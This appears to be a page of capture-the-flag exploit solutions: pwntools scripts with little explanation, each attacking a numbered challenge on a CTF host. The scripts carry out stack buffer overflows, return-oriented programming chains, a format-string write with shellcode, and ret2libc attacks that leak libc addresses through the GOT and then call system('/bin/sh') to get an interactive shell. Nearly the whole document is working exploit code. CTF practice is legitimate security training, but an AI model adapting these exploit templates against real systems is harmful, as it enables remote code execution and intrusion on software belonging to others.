Hello_Pwn
hello_pwn2
1 2 3 4 5 6 7 8 9 10 11 12
| from pwn import *
r = remote("ctf.nynusec.com",28944)
payload = b'M'*4 + p64(0x6E756161) r.sendline(payload)
r.interactive()
|
pwnpwn
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| from pwn import *
r = remote("ctf.nynusec.com",28928)
backdoor = 0x400596
payload = b'M'*0x88 + p64(backdoor) r.recv() r.sendline(payload)
r.interactive()
|
easyStack
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| from turtle import back from pwn import *
r = remote("ctf.nynusec.com",28599)
elf = ELF("easyStack") backdoor = elf.symbols['fun']
payload = b'M'*0x18 + p64(backdoor) r.recv() r.sendline(payload)
r.interactive()
|
rop_test
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| from pwn import *
r = remote("ctf.nynusec.com",28686) elf =ELF("rop_test")
system_addr = elf.symbols['system'] bin_sh_addr = 0x804A024
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr) r.recv() r.sendline(payload)
r.interactive()
|
pwn_string
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| from pwn import *
r = remote("ctf.nynusec.com",28836) context(log_level = 'debug', arch = 'amd64', os = 'linux')
r.recvuntil('secret[0] is ') addr = int(r.recvuntil('\n'), 16) payload = '%85d%7$n' r.sendlineafter('be:', 'aaa') r.sendlineafter('up?:', 'east') r.sendlineafter('leave(0)?:', '1') r.sendlineafter("address'", str(addr)) r.sendlineafter('is:', payload) shellcode = asm(shellcraft.sh()) r.sendlineafter('SPELL', shellcode)
r.interactive()
|
pwn_guess
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| from pwn import *
r=remote("ctf.nynusec.com",28690)
payload = b'M'*0x20 + p64(1) r.recvuntil("name:") r.sendline(payload)
rand = [2,5,4,2,6,2,5,1,4,2]
for i in range(10): r.sendlineafter("Please input your guess number:",str(rand[i]))
r.interactive()
|
pwn_int
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| from pwn import *
r = remote("ctf.nynusec.com",28599)
backdoor = 0x804868B
r.recv() r.sendline("1") r.recv() r.sendline("m0sway") r.recv() payload = b'M'*(0x14+4) + p32(backdoor) payload = payload.ljust(259, b'M') r.sendline(payload)
r.interactive()
|
S2-stack
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| from matplotlib import interactive from pwn import *
r = remote("ctf.nynusec.com",28052)
backdoor = 0x804850F
payload = b'M'*(9+4) + p32(backdoor) r.recv() r.sendline(payload)
r.interactive()
|
S2-pwn1-rop
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| from pwn import *
r = remote("ctf.nynusec.com",28482) elf = ELF("S2-pwn1-rop")
rdi_addr = 0x400683 bin_sh_addr = 0x601048 system_addr = elf.plt['system']
payload = b'M'*(0x10+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) r.recv() r.sendline(payload)
r.interactive()
|
S2-pwn2-libc-rop
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
| from pwn import * from LibcSearcher import *
r = remote("ctf.nynusec.com",28455) lib = ELF("../buu/ubuntu18(64).so") elf = ELF("PWN_libc")
puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] rdi_addr = 0x400c83 main_addr = elf.symbols['main'] ret=0x4006b9
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr) r.recv() r.sendline('1') r.recv() r.sendline(payload) r.recvline() r.recvline() puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
base_addr = puts_addr - lib.symbols['puts'] system_addr = base_addr + lib.symbols['system'] bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))
payload2 = b'\x00' + b'M'*(0x50+8-1) + p64(ret) +p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) r.recv() r.sendline('1') r.recv() r.sendline(payload2)
r.interactive()
|
libcc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| from pwn import *
r = remote("ctf.nynusec.com",28249) elf =ELF("level3") libc = ELF("libc6-i386_2.23-0ubuntu11.3_amd64.so")
write_plt = elf.plt['write'] write_got = elf.got['write'] main_addr = elf.symbols['main']
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) r.sendlineafter(b"Input:\n",payload) write_addr = u32(r.recv(4))
base_addr = write_addr - libc.symbols['write'] system_addr = base_addr + libc.symbols['system'] bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr) r.sendlineafter(b"Input:\n",payload)
r.interactive()
|
PWN-libc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
| from git import base from pwn import * from LibcSearcher import *
r = remote("ctf.nynusec.com",28654) lib = ELF("libc.23.so") elf = ELF("PWN_libc")
puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] rdi_addr = 0x400c83 main_addr = elf.symbols['main']
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr) r.recv() r.sendline('1') r.recv() r.sendline(payload) r.recvline() r.recvline() puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
base_addr = puts_addr - lib.symbols['puts'] system_addr = base_addr + lib.symbols['system'] bin_sh_addr = base_addr + next(lib.search(b"/bin/sh")) one_gadget_addr = 0x45216 + base_addr
payload2 = b'\x00' + b'M'*(0x50+8-1) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) r.recv() r.sendline('1') r.recv() r.sendline(payload2)
r.interactive()
|